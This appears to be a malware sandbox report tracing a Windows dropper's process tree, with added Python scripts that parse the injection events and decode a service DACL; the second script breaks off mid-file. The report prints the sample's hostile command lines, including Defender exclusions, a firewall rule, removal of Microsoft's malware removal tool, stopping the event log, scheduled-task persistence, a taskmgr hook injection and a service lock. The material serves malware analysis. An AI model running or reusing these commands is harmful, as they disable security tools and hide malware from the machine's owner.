Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4304 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3284 wrote to memory of 4304 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 4300 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 4700 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp
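
The rows above are one record per WriteProcessMemory call, so the same writer/target pair repeats, and the writer image is N/A where the sandbox did not attribute it. What an analyst wants from this table is the writer-to-target graph with the per-pair call counts, because every ordinary spawn in the table produces two or three rows while the eight writes from 4312 into a second copy of C12D.exe stand out. The script below is an added example, not part of the original report: it parses a subset of the rows exactly as they appear, rebuilds the tree from PID 3284, and flags pairs where the writer and target are the identical image path (a loader writing into a fresh copy of itself). Full path rather than basename is compared because the 64-bit regsvr32.exe handing C583.dll to its SysWOW64 copy is a same-basename write that is normal WoW64 behaviour.

```python
"""Rebuild the writer -> target process graph from the sandbox's
"Suspicious use of WriteProcessMemory" rows.  Added example, not part of the
original report.  Row layout is assumed to be exactly the table's:
'PID <src> wrote to memory of <dst> N/A <writer image|N/A> <target image>'."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>\S+) (?P<dst_img>\S+)$"   # the paths in this report contain no spaces
)

# A subset of the rows from the table above, copied verbatim.  The eight writes
# from 4312 into 1256 are kept in full so the per-pair counting is visible.
ROWS = r"""
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4304 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"""


@dataclass(frozen=True)
class WriteEvent:
    src: int
    dst: int
    src_img: str   # "N/A" when the sandbox did not record the writer's image
    dst_img: str


def parse_rows(text: str) -> List[WriteEvent]:
    """One WriteEvent per non-blank row; an unexpected row is an error, not skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        events.append(WriteEvent(int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"]))
    return events


def build_graph(events: List[WriteEvent]):
    """Return (writer -> Counter of targets, pid -> image path)."""
    graph: Dict[int, Counter] = defaultdict(Counter)
    images: Dict[int, str] = {}
    for e in events:
        graph[e.src][e.dst] += 1
        if e.src_img != "N/A":
            images.setdefault(e.src, e.src_img)
        images.setdefault(e.dst, e.dst_img)
    return dict(graph), images


def render_tree(graph, images, root: int, depth: int = 0, writes=None) -> List[str]:
    """Indented tree under `root`; each child shows how many writes it received."""
    label = f"{root}  {images.get(root, '(image not recorded)')}"
    if writes is not None:
        label += f"  [{writes} write{'s' if writes != 1 else ''} from parent]"
    lines = [("  " * depth) + label]
    for child, n in sorted(graph.get(root, {}).items()):
        lines.extend(render_tree(graph, images, child, depth + 1, n))
    return lines


def self_image_writes(events: List[WriteEvent]) -> List[Tuple[int, int]]:
    """Pairs where the writer's image path equals the target's: a binary writing
    into a fresh copy of itself.  Full path, not basename, so the 64-bit
    regsvr32.exe relaunching its SysWOW64 copy is not reported."""
    return sorted({(e.src, e.dst) for e in events
                   if e.src_img != "N/A" and e.src_img == e.dst_img})


if __name__ == "__main__":
    evs = parse_rows(ROWS)
    g, imgs = build_graph(evs)
    print("\n".join(render_tree(g, imgs, 3284)))
    print("same-image writes:", self_image_writes(evs))
```

Running it prints the tree rooted at 3284 with the write counts on each edge and reports (4312, 1256) as the only same-image pair; the regsvr32 and 1A5.exe edges are ordinary spawns with two or three writes each.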

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C583.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\C583.dll

C:\Users\Admin\AppData\Local\Temp\E021.exe

C:\Users\Admin\AppData\Local\Temp\E021.exe

C:\Users\Admin\AppData\Local\Temp\E5A0.exe

C:\Users\Admin\AppData\Local\Temp\E5A0.exe

C:\Users\Admin\AppData\Local\Temp\1A5.exe

C:\Users\Admin\AppData\Local\Temp\1A5.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Users\Admin\AppData\Local\Temp\134A.exe

C:\Users\Admin\AppData\Local\Temp\134A.exe

C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp

C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\24EE.exe

C:\Users\Admin\AppData\Local\Temp\24EE.exe

C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp" /SL5="$3024C,4470470,54272,C:\Users\Admin\AppData\Local\Temp\24EE.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp" /SL5="$B0060,4314505,54272,C:\Users\Admin\AppData\Local\Temp\3F7C.exe"

C:\Users\Admin\AppData\Local\Temp\449E.exe

C:\Users\Admin\AppData\Local\Temp\449E.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\wfcvvwd

C:\Users\Admin\AppData\Roaming\wfcvvwd

C:\Users\Admin\AppData\Roaming\hucvvwd

C:\Users\Admin\AppData\Roaming\hucvvwd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 19004

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe
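
The `sc sdset WinDefender ...` command line above rewrites the DACL of the service the sample installs as C:\Windows\windefender.exe. Read ACE by ACE, the allow entry for Administrators (BA) omits WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and the following `(D;;WPDT;;;BA)` denies both outright, so an elevated `sc stop` or Services.msc cannot stop the service while LocalSystem (SY) still can. The deny ACE sits after the allow ACE, which is not canonical order, but the outcome is the same here because the allow ACE already leaves those two rights out. The script below is an added example, not part of the original report or of any Windows tool: it parses the SDDL string exactly as it appears above and computes a token's effective service rights with the same in-order first-match rule that AccessCheck applies. The two-letter right codes are the standard service-object codes; the SID display names and the set of group SIDs assumed for an elevated admin token are assumptions made for the demonstration.

```python
"""Decode the service DACL that the `sc sdset WinDefender ...` command line
above installs, and compute the rights a caller's token ends up with.
Added example, not part of the original report or of any Windows tool."""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Set

# Two-letter access-right codes as written by sc sdset for service objects.
SERVICE_RIGHTS: Dict[str, str] = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Display names for the SID aliases used in the report's string.
WELL_KNOWN = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
              "SU": "Service", "WD": "Everyone"}

# Copied verbatim from the command line above.
REPORT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
               "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Group SIDs assumed to be present in an elevated local admin token (assumption).
ADMIN_TOKEN: Set[str] = {"BA", "IU", "WD"}


@dataclass(frozen=True)
class Ace:
    kind: str               # "A" allow, "D" deny, "AU" audit
    flags: str
    rights: FrozenSet[str]
    sid: str


ACL_RE = re.compile(r"(?P<acl>[DS]):(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def split_rights(mask: str) -> FrozenSet[str]:
    """Only two-letter codes are accepted; a hex mask is refused, not guessed."""
    if mask.startswith("0x") or len(mask) % 2:
        raise ValueError(f"unsupported access mask {mask!r}")
    codes = {mask[i:i + 2] for i in range(0, len(mask), 2)}
    unknown = codes - SERVICE_RIGHTS.keys()
    if unknown:
        raise ValueError(f"unknown right code(s) {sorted(unknown)}")
    return frozenset(codes)


def parse_sddl(sddl: str) -> Dict[str, List[Ace]]:
    """Return {'D': [DACL ACEs], 'S': [SACL ACEs]} in string order."""
    acls: Dict[str, List[Ace]] = {"D": [], "S": []}
    for m in ACL_RE.finditer(sddl):
        for body in ACE_RE.findall(m["aces"]):
            fields = body.split(";")
            if len(fields) < 6:
                raise ValueError(f"malformed ACE {body!r}")
            kind, flags, rights, _obj, _inherit, sid = fields[:6]
            acls[m["acl"]].append(Ace(kind, flags, split_rights(rights), sid))
    return acls


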